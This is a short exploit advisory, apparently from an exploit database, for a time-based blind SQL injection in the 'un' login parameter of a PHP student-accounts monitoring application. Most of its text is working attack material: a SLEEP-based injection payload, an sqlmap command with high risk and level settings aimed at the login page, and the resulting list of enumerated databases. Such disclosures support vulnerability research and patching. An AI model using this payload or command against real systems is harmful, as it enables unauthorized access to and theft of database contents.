# Exploit Title: Monitoring of Students Cyber Accounts System | 'un' SQL Injection
# Exploit Author: Richard Jones
# Date: 2021-03-12
# Vendor Homepage: https://www.sourcecodester.com/php/11743/monitoring-students-cyber-accounts.html
# Software Link: https://www.sourcecodester.com/download-code?nid=11743&title=Monitoring+of+Students+Cyber+Accounts+System+using+PHP+with+Source+Code
# Version: 1.0
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34

#Exploit:

#Parameter: un (POST)
#    Type: time-based blind
#    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
#    Payload: un=aaaaa' AND (SELECT 2967 FROM (SELECT(SLEEP(5)))fGEg) AND 'VDNV'='VDNV&up=bbbbbb&log=Login

#Example:

# sqlmap -u http://127.0.0.1/MSCAB/login.php --risk 3 --level 3 --batch --dbs --data="un=asd&up=asdas&log=Login"
#Results: 
#available databases [17]:
#[*] asidatabase
#[*] attendance
#[*] attendance_management
#[*] bilal
#[*] carrental
#[*] chatme
#[*] dragonhousedb
#[*] fbc_reviewer
#[*] hrm
#[*] information_schema
#[*] mscabdb
#[*] mysql
#[*] performance_schema
#[*] phpmyadmin
#[*] sourcecodester_mysqli
#[*] subriondb
#[*] test